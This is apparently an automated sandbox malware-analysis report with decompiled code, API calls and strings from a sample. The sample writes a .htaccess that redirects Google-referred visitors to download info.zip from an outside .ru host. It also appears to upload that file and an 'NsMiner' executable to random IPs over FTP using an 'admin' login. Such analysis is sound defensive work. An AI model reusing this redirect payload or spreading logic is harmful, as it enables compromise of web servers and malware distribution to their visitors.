Opcode ID: 5d4353cd5e4406074d4c0454a2c74952f081f6b8fa77e9bf371b2783b0e215ba
Instruction ID: b13884d05d15219fbed4f3ee1bfbbe63ebf00972ec7501c94441b210e5adb923
Opcode Fuzzy Hash: 5d4353cd5e4406074d4c0454a2c74952f081f6b8fa77e9bf371b2783b0e215ba
Instruction Fuzzy Hash: 5C417FB5508341CFC700AF29C48626FFBF0AF44345F018A2EE8959B396D778D545CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 004135A0, Relevance: 24.6, APIs: 9, Strings: 5, Instructions: 107
sleepfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 31%

			E004135A0(void* __edx, char _a4) {
				void* _v24;
				char _v32;
				char _v1056;
				signed char _v1310;
				signed int _v1311;
				signed int _v1312;
				char _v1316;
				intOrPtr* _v1340;
				intOrPtr _v1344;
				char* _v1348;
				intOrPtr _v1352;
				intOrPtr _v1356;
				intOrPtr _v1376;
				char _v1380;
				signed int _v1384;
				char* _v1388;
				intOrPtr _v1392;
				char* _v1396;
				char* _v1400;
				char* _v1404;
				char* _t68;
				struct _IO_FILE* _t71;
				signed int _t72;
				char* _t79;
				CHAR* _t86;
				char* _t89;
				CHAR* _t94;
				DWORD* _t96;
				CHAR* _t98;
				signed int _t101;
				intOrPtr* _t103;
				char** _t104;
				char** _t105;
				intOrPtr* _t106;

				_t89 =  &_a4;
				_t103 = (_t101 & 0xfffffff0) - 0x568;
				_v1348 =  &_v32;
				_v1340 = _t103;
				_v1356 = E00401C90;
				_v1352 = 0x413838;
				_v1344 = E004137B5;
				 *_t103 =  &_v1380;
				E0040C250(_t89, __edx, _t89);
				E0040B9C0();
				_v1316 = 0x100;
				_v1404 =  &_v1316;
				 *_t103 =  &_v1312;
				_v1376 = 0xffffffff;
				GetComputerNameA(_t86, _t96); // executed
				_t90 = _v1312;
				_t104 = _t103 - 8;
				_t93 = _v1311 * _v1312;
				_v1384 = _v1310 * _v1311 * _v1312;
				_v1400 = 0x400;
				_v1404 =  &_v1056;
				 *_t104 = "%TEMP%";
				ExpandEnvironmentStringsA(_t94, _t98,  *(_t89 - 4));
				_t68 =  &_v1056;
				_t105 = _t104 - 0xc;
				_v1396 = "\\.htaccess";
				_v1400 = _t68;
				_v1404 = "%s%s";
				 *_t105 = _t68;
				sprintf(??, ??);
				_v1404 = 0x41509d;
				 *_t105 =  &_v1056; // executed
				_t71 = fopen(??, ??); // executed
				if(_t71 != 0) {
					_v1388 = _t71;
					_v1396 = _t71;
					_v1400 = 0x6f;
					_v1404 = 1;
					 *_t105 = "RewriteEngine on\nRewriteCond %{HTTP_REFERER} ^(.*)google\\.(.*)\nRewriteRule .* http://testswork.ru/info.zip [L]\n";
					fwrite(??, ??, ??, ??);
					 *_t105 = _v1388; // executed
					fclose(??); // executed
				}
				_t72 = _v1384;
				_v1388 = _t72 + 0xc9;
				_v1392 = _t72 + 0x1312dc9;
				do {
					 *_t105 = 0x1388;
					_v1376 = 0xffffffff;
					Sleep(??); // executed
					_v1384 = _v1388 - 0xc8;
					_t106 = _t105 - 4;
					do {
						 *_t106 = 1;
						_v1376 = 1;
						Sleep(??);
						_t106 = _t106 - 4;
						_v1404 = 0;
						 *_t106 = E00401340;
						_v1400 = _v1384;
						L0040CF60();
						_v1384 = _v1384 + 2;
					} while (_v1384 != _v1388);
					_t79 = _v1384 + 0xc8;
					_v1388 = _t79;
				} while (_t79 != _v1392);
				 *_t106 =  &_v1380;
				E0040C3D0(_t90, _t93);
				return 0;
			}

0x004135a0
0x004135b4
0x004135ba
0x004135c6
0x004135cc
0x004135d6
0x004135e0
0x004135ea
0x004135ed
0x004135f2
0x004135fd
0x00413607
0x00413611
0x00413614
0x0041361e
0x0041362a
0x00413633
0x00413639
0x00413645
0x00413651
0x00413659
0x0041365d
0x00413664
0x00413669
0x0041366f
0x00413672
0x0041367a
0x0041367e
0x00413686
0x00413689
0x00413694
0x0041369c
0x0041369f
0x004136a6
0x004136a8
0x004136ae
0x004136b2
0x004136ba
0x004136c2
0x004136c9
0x004136d4
0x004136d7
0x004136d7
0x004136dc
0x004136ed
0x004136f3
0x00413700
0x00413700
0x00413707
0x00413711
0x00413721
0x00413727
0x00413730
0x00413730
0x00413737
0x00413741
0x0041374c
0x0041374f
0x00413757
0x0041375e
0x00413762
0x00413767
0x00413774
0x00413782
0x0041378d
0x0041378d
0x0041379f
0x004137a2
0x004137b4

APIs

GetComputerNameA.KERNEL32 ref: 0041361E
ExpandEnvironmentStringsA.KERNEL32 ref: 00413664
sprintf.MSVCRT ref: 00413689
fopen.MSVCRT ref: 0041369F
fwrite.MSVCRT ref: 004136C9
fclose.MSVCRT ref: 004136D7
Sleep.KERNEL32 ref: 00413711
Sleep.KERNEL32 ref: 00413741
_beginthread.MSVCRT ref: 00413762

Strings

%TEMP%, xrefs: 0041365D
\.htaccess, xrefs: 00413672
o, xrefs: 004136B2
RewriteEngine onRewriteCond %{HTTP_REFERER} ^(.*)google\.(.*)RewriteRule .* http://testswork.ru/info.zip [L], xrefs: 004136C2
%s%s, xrefs: 0041367E

Memory Dump Source

Source File: 00000005.00000002.220019214.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.220009208.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.220049096.0000000000414000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.220056022.0000000000415000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.220075442.000000000041E000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_tftp.jbxd

Similarity

API ID: Sleep$ComputerEnvironmentExpandNameStrings_beginthreadfclosefopenfwritesprintf
String ID: %TEMP%$%s%s$RewriteEngine onRewriteCond %{HTTP_REFERER} ^(.*)google\.(.*)RewriteRule .* http://testswork.ru/info.zip [L]$\.htaccess$o
API String ID: 1512350951-985008343
Opcode ID: d857f81ee13d6b9a288a4b46b200ee637e77883cf994ed467d40e24388a1f183
Instruction ID: 7c0a3a6b0828a716a4c9ba859062a61c2174c8624353dada6a2719317638c1e2
Opcode Fuzzy Hash: d857f81ee13d6b9a288a4b46b200ee637e77883cf994ed467d40e24388a1f183
Instruction Fuzzy Hash: 81511CB1804B188ECB20EF64CD857DFBBF4AB44305F4085AED498A7280E7399AC5CF55

Uniqueness

Uniqueness Score: -1.00%

Function 0040DFE0, Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 108
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 21%

			E0040DFE0(void* __ebx, void* __edx, void* __edi, void* __esi) {
				intOrPtr* _t28;
				void** _t29;
				void* _t31;
				void* _t32;
				void* _t37;
				void* _t38;
				void* _t39;
				int _t40;
				int _t43;
				void* _t47;
				int _t49;
				void* _t52;
				void* _t60;
				void* _t61;
				void* _t72;
				void* _t77;
				void* _t79;
				void* _t80;
				void** _t81;
				void** _t84;
				void* _t85;

				_t60 = __edx;
				_t80 = _t79 - 0x3c;
				_t52 = _t80 + 0x20;
				memcpy(_t52, 0x41432c, 4 << 2);
				_t81 = _t80 + 0xc;
				_t28 =  *0x41dafc;
				if(_t28 == 0) {
					_t28 = E0040D084();
					 *0x41dafc = _t28;
				}
				if( *_t28 != 1) {
					E0040DF70(_t28, 0, _t60);
				}
				_t29 =  *0x41daf8;
				if(_t29 == 0) {
					_t29 = E0040D0A8();
					 *0x41daf8 = _t29;
				}
				 *_t81 =  *_t29;
				_t31 = TlsGetValue(??);
				_push(0x41432c);
				_t72 = _t31;
				if(_t31 == 0) {
					_t32 = E0040DAE8(_t60);
					_t77 = _t32;
					if( *0x41f00c == 0 || _t32 == 0) {
						goto L5;
					} else {
						 *(_t32 + 0x24) = 1;
						 *((intOrPtr*)(_t77 + 0x44)) = GetCurrentThreadId();
						_t81[3] = 0;
						_t81[2] = 0;
						_t81[1] = 1;
						 *_t81 = 0;
						 *((intOrPtr*)(_t77 + 0x18)) = CreateEventA(??, ??, ??, ??);
						 *((intOrPtr*)(_t77 + 0x1c)) = 0xffffffff;
						_t10 = _t77 + 0x34; // 0x34
						memcpy(_t10, _t52, 4 << 2);
						_t84 = _t81 - 0x10 + 0xc;
						 *(_t77 + 0x6c) = 0;
						 *(_t77 + 0x14) = 0;
						_t37 = GetCurrentProcess();
						_t38 = GetCurrentThread();
						_t39 = GetCurrentProcess();
						_t84[6] = 2;
						_t84[5] = 0;
						_t84[4] = 0;
						_t17 = _t77 + 0x14; // 0x14
						_t61 = _t17;
						_t84[3] = _t61;
						_t84[2] = _t37;
						_t84[1] = _t38;
						 *_t84 = _t39; // executed
						_t40 = DuplicateHandle(??, ??, ??, ??, ??, ??, ??); // executed
						_t85 = _t84 - 0x1c;
						if(_t40 == 0) {
							L15:
							abort();
							return 0;
						} else {
							 *_t85 =  *(_t77 + 0x14);
							_t43 = GetThreadPriority(??);
							_push(_t61);
							 *(_t77 + 0x74) = _t43;
							 *(_t77 + 0x70) = 0;
							 *(_t77 + 0x20) =  *(_t77 + 0x20) & 0xffffffcf | 0x00000010;
							_t47 =  *0x41daf8;
							if(_t47 == 0) {
								_t47 = E0040D0A8();
								 *0x41daf8 = _t47;
							}
							 *(_t85 + 4) = _t77;
							 *_t85 =  *_t47;
							_t49 = TlsSetValue(??, ??);
							_t81 = _t85 - 8;
							if(_t49 == 0) {
								goto L15;
							} else {
								_t72 = _t77;
								goto L5;
							}
						}
					}
				} else {
					L5:
					return _t72;
				}
			}

0x0040dfe0
0x0040dfe4
0x0040dfe7
0x0040dff7
0x0040dff7
0x0040dff9
0x0040e000
0x0040e138
0x0040e13d
0x0040e13d
0x0040e009
0x0040e00b
0x0040e00b
0x0040e010
0x0040e017
0x0040e148
0x0040e14d
0x0040e14d
0x0040e01f
0x0040e022
0x0040e027
0x0040e028
0x0040e02c
0x0040e038
0x0040e03d
0x0040e047
0x00000000
0x0040e04d
0x0040e04d
0x0040e059
0x0040e05c
0x0040e064
0x0040e06c
0x0040e074
0x0040e083
0x0040e086
0x0040e08d
0x0040e097
0x0040e097
0x0040e099
0x0040e0a0
0x0040e0a7
0x0040e0ae
0x0040e0b5
0x0040e0ba
0x0040e0c2
0x0040e0ca
0x0040e0d2
0x0040e0d2
0x0040e0d5
0x0040e0d9
0x0040e0dd
0x0040e0e1
0x0040e0e4
0x0040e0e9
0x0040e0ee
0x0040e163
0x0040e163
0x0040e16a
0x0040e0f0
0x0040e0f3
0x0040e0f6
0x0040e0fb
0x0040e0fc
0x0040e0ff
0x0040e10f
0x0040e112
0x0040e119
0x0040e157
0x0040e15c
0x0040e15c
0x0040e11b
0x0040e121
0x0040e124
0x0040e129
0x0040e12e
0x00000000
0x0040e130
0x0040e130
0x00000000
0x0040e130
0x0040e12e
0x0040e0ee
0x0040e02e
0x0040e02e
0x0040e037
0x0040e037

APIs

TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040EF28), ref: 0040E022

Part of subcall function 0040DF70: fprintf.MSVCRT ref: 0040DFB0

GetCurrentThreadId.KERNEL32 ref: 0040E054
CreateEventA.KERNEL32 ref: 0040E07B
GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040E0A7
GetCurrentThread.KERNEL32 ref: 0040E0AE
GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040E0B5
DuplicateHandle.KERNEL32 ref: 0040E0E4
GetThreadPriority.KERNEL32 ref: 0040E0F6
TlsSetValue.KERNEL32 ref: 0040E124

Strings

,CA, xrefs: 0040DFEB

Memory Dump Source

Source File: 00000005.00000002.220019214.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.220009208.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.220049096.0000000000414000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.220056022.0000000000415000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.220075442.000000000041E000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_tftp.jbxd

Similarity

API ID: Current$Thread$ProcessValue$CreateDuplicateEventHandlePriorityfprintf
String ID: ,CA
API String ID: 3543011388-345574230
Opcode ID: 52a81ef13c5ddcbee96dc192e94c5f3b677e00ac1d85e907ae155c8aca360eb4
Instruction ID: 4c1b19d1959482bec2df247b33d628075a4e1fdb492dd10556489eef41e88c49
Opcode Fuzzy Hash: 52a81ef13c5ddcbee96dc192e94c5f3b677e00ac1d85e907ae155c8aca360eb4
Instruction Fuzzy Hash: 824159B09043058BDB00EF76C44579E7AE4AF44388F00497EE894AB391DBB9C954CBAA

Uniqueness

Uniqueness Score: -1.00%

Function 00410DA0, Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 132
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 32%

			E00410DA0(void* __eflags, void* _a4, signed int _a8, intOrPtr* _a12) {
				void* _v16;
				void* _v32;
				void _v33;
				char _v34;
				int _v36;
				intOrPtr _v40;
				char _v48;
				void* _v52;
				intOrPtr _v56;
				void* _t44;
				void* _t50;
				long _t51;
				signed short _t52;
				void* _t56;
				void* _t61;
				char* _t63;
				signed short _t64;
				void* _t66;
				void* _t71;
				void* _t72;
				signed char _t81;
				void* _t92;
				int _t94;
				signed int _t97;
				void* _t114;
				void* _t115;
				intOrPtr* _t119;
				void** _t120;
				void** _t121;

				asm("repne scasb");
				_v36 = 0xbadbac;
				_v40 = 0xbadbbb;
				_t44 = E0040CC90(0xbadbe0);
				_t71 =  &_v48;
				memcpy(_t71, "gcc-shmem-tdm2", 0xe);
				_v34 = 0x2d;
				memcpy( &_v33, _a4, _v36);
				memset(_t71 + 0xbadbbc, 0x61, 0 << 0);
				_t119 = _t115 - _t44 + 0x24;
				 *((char*)(_t119 + 0xbadbe8)) = 0;
				 *((char*)(_t119 + _v40 + 0xc)) = 0;
				_v52 = _t71;
				_v56 = 0;
				 *_t119 = 0; // executed
				_t50 = CreateMutexA(??, ??, ??); // executed
				_t120 = _t119 - 0xc;
				_v32 = _t50;
				 *((char*)(_t71 + _v40)) = 0x2d;
				_v56 = 0xffffffff;
				 *_t120 = _t50;
				_t51 = WaitForSingleObject(??, ??);
				_t121 = _t120 - 8;
				if(_t51 != 0) {
					asm("int3");
				}
				 *_t121 = _t71;
				_t52 = FindAtomA(??);
				_push(0);
				if(_t52 != 0) {
					 *_t121 = _v36 + 0x10;
					_t92 = _t71;
					_t72 = E00410D2C(_t52 & 0x0000ffff, 0xbadbdc, _t92);
					L10:
					 *_t121 = _v32;
					_t56 = ReleaseMutex(??);
					 *_t121 = _v32;
					CloseHandle(_t56);
					_push(_t92);
					return _t72;
				}
				 *_t121 = _a8; // executed
				_t61 = malloc(??); // executed
				_t114 = _t61;
				_t94 = _v36 + 0x10;
				_v36 = _t94;
				_t63 = _t94 + _t71;
				_t81 = 0x20;
				do {
					_t97 = _t114 >> _t81 & 0x00000001;
					if(_t97 != 0) {
						 *_t63 = 0x41;
					}
					_t63 = _t63 + 1;
					_t81 = _t81 - 1;
				} while (_t81 != 0);
				 *_t121 = _t71; // executed
				_t64 = AddAtomA(??); // executed
				_push(_t97);
				if(_t64 == 0) {
					asm("int3");
				}
				 *_t121 = _v36;
				_t92 = _t71;
				_t66 = E00410D2C(_t64 & 0x0000ffff, 0xbadbdc, _t92);
				_t72 = _t66;
				if(_t66 == _t114) {
					memset(_t114, 0, _a8 << 0);
					_t121 =  &(_t121[3]);
					if(_a12 != 0) {
						 *_t121 = _t114;
						 *_a12();
					}
				} else {
					 *_t121 = _t114;
					free(??);
				}
				goto L10;
			}

0x00410db3
0x00410dbc
0x00410dc2
0x00410dcb
0x00410dd2
0x00410de2
0x00410de4
0x00410df5
0x00410e01
0x00410e01
0x00410e06
0x00410e0e
0x00410e13
0x00410e17
0x00410e1f
0x00410e26
0x00410e2b
0x00410e2e
0x00410e34
0x00410e38
0x00410e40
0x00410e43
0x00410e48
0x00410e4d
0x00410e4f
0x00410e4f
0x00410e50
0x00410e53
0x00410e58
0x00410e5c
0x00410ef1
0x00410ef6
0x00410efd
0x00410ec2
0x00410ec5
0x00410ec8
0x00410ed1
0x00410ed4
0x00410ed9
0x00410ee3
0x00410ee3
0x00410e65
0x00410e68
0x00410e6d
0x00410e72
0x00410e75
0x00410e7a
0x00410e7c
0x00410e84
0x00410e88
0x00410e8b
0x00410e8d
0x00410e8d
0x00410e90
0x00410e91
0x00410e91
0x00410e94
0x00410e97
0x00410e9c
0x00410ea0
0x00410ee4
0x00410ee4
0x00410ea8
0x00410ead
0x00410eaf
0x00410eb4
0x00410eb8
0x00410f08
0x00410f08
0x00410f0f
0x00410f11
0x00410f17
0x00410f17
0x00410eba
0x00410eba
0x00410ebd
0x00410ebd
0x00000000

APIs

CreateMutexA.KERNEL32 ref: 00410E26
WaitForSingleObject.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0040DD4B), ref: 00410E43
FindAtomA.KERNEL32 ref: 00410E53
malloc.MSVCRT ref: 00410E68
AddAtomA.KERNEL32 ref: 00410E97
free.MSVCRT ref: 00410EBD
ReleaseMutex.KERNEL32 ref: 00410EC8
CloseHandle.KERNEL32(00000000), ref: 00410ED4

Strings

gcc-shmem-tdm2, xrefs: 00410DD6
-, xrefs: 00410DE4

Memory Dump Source

Source File: 00000005.00000002.220019214.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.220009208.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.220049096.0000000000414000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.220056022.0000000000415000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.220075442.000000000041E000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_tftp.jbxd

Similarity

API ID: AtomMutex$CloseCreateFindHandleObjectReleaseSingleWaitfreemalloc
String ID: -$gcc-shmem-tdm2
API String ID: 2340547327-3993234110
Opcode ID: b32fc82eea3b263238fcedf67522db137280cfc3ceb69f1ab81693235ef06093
Instruction ID: a361d6316574303425b2d2364b90ccb8a52bb799ac869c5326074f0de35b9335
Opcode Fuzzy Hash: b32fc82eea3b263238fcedf67522db137280cfc3ceb69f1ab81693235ef06093
Instruction Fuzzy Hash: EB4196756043098BCB00EF69C4846EEFBE1AF88314F158A2EE894A7341DB78D981CB95

Uniqueness

Uniqueness Score: -1.00%

Function 0040CEA9, Relevance: 3.0, APIs: 2, Instructions: 23
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 58%

			E0040CEA9(void* __eax, void* __edi, void* __esi) {
				intOrPtr _t11;
				void* _t13;
				void* _t15;
				intOrPtr* _t17;

				_t13 = __esi;
				_t3 = __esi + 0x31; // 0x31
				__ecx = _t3;
				__esi =  *((intOrPtr*)(__ebp - 0x1c));
				__eax = __ax & 0x0000ffff;
				__edx = __edi;
				__esi = E0040CCC0(__ax & 0x0000ffff, _t3, __edi,  *((intOrPtr*)(__ebp - 0x1c)));
				_t11 =  *((intOrPtr*)(_t15 - 0x20));
				 *_t17 = _t11;
				ReleaseMutex(??);
				 *((intOrPtr*)(_t17 - 4)) = _t11; // executed
				CloseHandle(??); // executed
				return _t13;
			}

0x0040cea9
0x0040ceb0
0x0040ceb0
0x0040ceb3
0x0040ceb6
0x0040ceb9
0x0040cec3
0x0040ce83
0x0040ce86
0x0040ce89
0x0040ce91
0x0040ce94
0x0040cea5

APIs

Part of subcall function 0040CCC0: GetAtomNameA.KERNEL32(?,?,0040BC00), ref: 0040CCE3

ReleaseMutex.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040CE89
CloseHandle.KERNEL32 ref: 0040CE94

Memory Dump Source

Source File: 00000005.00000002.220019214.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.220009208.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.220049096.0000000000414000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.220056022.0000000000415000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.220075442.000000000041E000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_tftp.jbxd

Similarity

API ID: AtomCloseHandleMutexNameRelease
String ID:
API String ID: 3326590946-0
Opcode ID: 4c53904c272bc45f8c76a5dd26ba97cb4bbc1f74fa93cf0730fdc1715afe45a4
Instruction ID: 74100bbd24046cddf9bfdf4b842df4f73f2c35fe31e155dd92095536fb6681ff
Opcode Fuzzy Hash: 4c53904c272bc45f8c76a5dd26ba97cb4bbc1f74fa93cf0730fdc1715afe45a4
Instruction Fuzzy Hash: 29E09AB2904528CBCB00BF6690811FEF7B0EF84318F01052EDC9AA3200C7387A1ACBC6

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00401340, Relevance: 63.3, APIs: 24, Strings: 12, Instructions: 283networkfilesleepCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 004013AA
rand.MSVCRT ref: 004013B5
srand.MSVCRT ref: 004013C8
rand.MSVCRT ref: 004013CD
Sleep.KERNEL32 ref: 00401400
sprintf.MSVCRT ref: 00401504
sprintf.MSVCRT ref: 004015A2
InternetOpenA.WININET ref: 004015D8
InternetSetOptionA.WININET ref: 00401625
InternetConnectA.WININET ref: 00401672
ExpandEnvironmentStringsA.KERNEL32 ref: 004016AB
sprintf.MSVCRT ref: 004016D6
FtpPutFileA.WININET ref: 00401706
sprintf.MSVCRT ref: 00401737
FtpPutFileA.WININET ref: 00401761
ExpandEnvironmentStringsA.KERNEL32 ref: 00401782
sprintf.MSVCRT ref: 004017B3
FtpPutFileA.WININET ref: 004017DD
InternetCloseHandle.WININET ref: 004017EE
InternetCloseHandle.WININET ref: 004017FF
_endthread.MSVCRT ref: 00401807
InternetCloseHandle.WININET ref: 0040182B
_endthread.MSVCRT ref: 00401833
_endthread.MSVCRT ref: 00401840

Strings

%TEMP%, xrefs: 0040169A
\info.zip, xrefs: 004016C3
%d.%d.%d.%d, xrefs: 004014FC
\.htaccess, xrefs: 0040171E
.htaccess, xrefs: 0040174C
info.zip, xrefs: 004016F1
\NsMiner\IMG001.exe, xrefs: 004017A0
%s%d%d0%d, xrefs: 0040157E
%s%s, xrefs: 004016CB, 0040172C, 004017A8
admin, xrefs: 00401655
%APPDATA%, xrefs: 0040177B
IMG001.exe, xrefs: 004017C8

Memory Dump Source

Source File: 00000005.00000002.220019214.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.220009208.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.220049096.0000000000414000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.220056022.0000000000415000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.220075442.000000000041E000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_tftp.jbxd

Similarity

API ID: Internet$sprintf$CloseFileHandle_endthread$EnvironmentExpandStringsrand$ConnectCountOpenOptionSleepTicksrand
String ID: %APPDATA%$%TEMP%$%d.%d.%d.%d$%s%d%d0%d$%s%s$.htaccess$IMG001.exe$\.htaccess$\NsMiner\IMG001.exe$\info.zip$admin$info.zip
API String ID: 1085645910-421748890
Opcode ID: 01eaef2559c25b0fa79dcea01769ae0a3d4c8548bb311ba3a7dcebd0c009553d
Instruction ID: b154a60413ae5071db46e6af933588e6ade1bb2a4c672c481c2589bd6a31cd02
Opcode Fuzzy Hash: 01eaef2559c25b0fa79dcea01769ae0a3d4c8548bb311ba3a7dcebd0c009553d
Instruction Fuzzy Hash: D5D12BB19043158FC714EF29C9856CEBBF1EB84344F44C5AEE458A7285DB789B88CF86

Uniqueness

Uniqueness Score: -1.00%

Function 00403730, Relevance: 22.8, APIs: 9, Strings: 4, Instructions: 84fileCOMMON

Download Yara Rule

APIs

fwrite.MSVCRT ref: 004037F3
fputs.MSVCRT ref: 0040380E
fwrite.MSVCRT ref: 00403836
fputs.MSVCRT ref: 00403856
fwrite.MSVCRT ref: 00403880
abort.MSVCRT ref: 00403885
free.MSVCRT ref: 00403891
abort.MSVCRT ref: 00403914
fwrite.MSVCRT ref: 0040393C

Strings

terminate called after throwing an instance of ', xrefs: 004037D8
-, xrefs: 0040391E
terminate called recursively, xrefs: 00403872
terminate called without an active exception, xrefs: 0040392E

Memory Dump Source

Source File: 00000005.00000002.220019214.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.220009208.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.220049096.0000000000414000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.220056022.0000000000415000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.220075442.000000000041E000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_tftp.jbxd

Similarity

API ID: fwrite$abortfputs$free
String ID: -$terminate called after throwing an instance of '$terminate called recursively$terminate called without an active exception
API String ID: 3544879925-3753627788
Opcode ID: 1eb7dd0f8316bc4b4ce6c7f54c1636285a29898a7d11caf33c07521bd146b36a
Instruction ID: bd95555b088a7938c1d8b8bdc8f8e6d8eff2494e428ec3023e912bc841ce4173
Opcode Fuzzy Hash: 1eb7dd0f8316bc4b4ce6c7f54c1636285a29898a7d11caf33c07521bd146b36a
Instruction Fuzzy Hash: 084194B1408341DFD300EF65C58935ABBE4AB85348F40896EF498AB2D1D7BD85848F5B

Uniqueness

Uniqueness Score: -1.00%

Function 0040FA18, Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 191
sleepthreadCOMMON

Download Yara Rule

C-Code - Quality: 42%

			E0040FA18(void* __edx, void* _a4, signed char* _a8, void* _a12, intOrPtr _a16) {
				char _v44;
				void* _v48;
				void* _v52;
				void* _v72;
				intOrPtr _v76;
				void* _v80;
				void* _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t63;
				void* _t65;
				void* _t70;
				void* _t71;
				void* _t72;
				signed char _t73;
				void* _t75;
				void* _t83;
				int _t87;
				void* _t89;
				void* _t92;
				void* _t96;
				void* _t107;
				signed char _t114;
				void* _t115;
				signed char* _t116;
				void* _t117;
				void* _t119;
				signed char* _t120;
				void** _t122;
				void** _t123;
				void** _t125;

				_t101 = __edx;
				_t120 = _a8;
				_t63 =  &_v44;
				_v52 = _t63;
				memcpy(_t63, 0x41432c, 4 << 2);
				_t122 =  &_v76 + 0xc;
				_t65 = E0040DAE8(_t101);
				_t92 = _t65;
				if(_t65 == 0) {
					return 0xb;
				} else {
					if(_a4 != 0) {
						_t101 = _a4;
						 *_t101 =  *(_t92 + 0xbc);
					}
					 *(_t92 + 0x70) = 0;
					 *((intOrPtr*)(_t92 + 4)) = _a16;
					 *((intOrPtr*)(_t92 + 8)) = _a12;
					 *(_t92 + 0x24) = 1;
					 *(_t92 + 0x14) = 0xffffffff;
					_t114 = 1;
					while(1) {
						_v80 = 0;
						_v84 = 0;
						_v88 = 1;
						 *_t122 = 0;
						_t70 = CreateEventA(??, ??, ??, ??);
						_t122 = _t122 - 0x10;
						 *(_t92 + 0x18) = _t70;
						if(_t70 != 0) {
							break;
						}
						if(_t114 == 1) {
							 *_t122 = 0;
							Sleep(??);
							_push(_t70);
							_t114 = _t114 + 1;
							continue;
						} else {
							 *_t122 = 0x14;
							Sleep(??);
							_push(0x414334);
							if(_t114 == 5) {
								 *(_t92 + 0x1c) = 0xffffffff;
								_t21 = _t92 + 0x34; // 0x34
								_t101 = _t21;
								_v48 = _t101;
								_t119 = _v52;
								_t72 = memcpy(_t101, _t119, 4 << 2);
								_t123 =  &(_t122[3]);
								_t107 = _t119 + 8;
								_t96 = 0;
								 *_t92 = 0xbab1f00d;
								 *(_t92 + 0x74) = 0;
								 *(_t92 + 0x6c) = 0;
								if(_t72 == 0) {
									L26:
									if(_a4 != 0) {
										_t101 = _a4;
										 *_a4 = 0;
									}
									E0040D3AC(_t92, _t101);
									return 0xb;
								} else {
									if(_t120 == 0) {
										L31:
										_t116 = 0;
									} else {
										L10:
										_t73 =  *_t120;
										 *(_t92 + 0x24) = _t73;
										_t116 = _a8;
										if((_t73 & 0x00000008) != 0) {
											_t72 =  *(E0040DFE0(_t92, _t101, _t107, _t116) + 0x74);
											 *(_t92 + 0x74) = _t72;
										} else {
											_t72 = _a12;
											 *(_t92 + 0x74) = _t72;
										}
									}
									L12:
									asm("lock or dword [esp], 0x0");
									_v72 = 0;
									_v76 = 4;
									_v80 = _t92;
									_v84 = E0040ECE4;
									_v88 = _t116;
									 *_t123 = 0;
									L004134A8();
									_t117 = _t72;
									if(_t72 == 0xffffffff || _t72 == 0) {
										_t75 =  *(_t92 + 0x18);
										if(_t75 != 0) {
											 *_t123 = _t75;
											CloseHandle(??);
											_push(_t117);
										}
										 *_t123 = _t92 + 0x1c;
										E00410BB4(_t96);
										memcpy(_v48, _v52, 4 << 2);
										 *(_t92 + 0x18) = 0;
										goto L26;
									} else {
										_t83 =  *(_t92 + 0x74);
										if(_t83 < 0xfffffff2) {
											_t83 = 0xfffffff1;
										} else {
											if(_t83 < 0xffffffff) {
												_t83 = 0xfffffffe;
											} else {
												if(_t83 > 0xe) {
													_t83 = 0xf;
												} else {
													if(_t83 > 1) {
														_t83 = 2;
													}
												}
											}
										}
										_v88 = _t83;
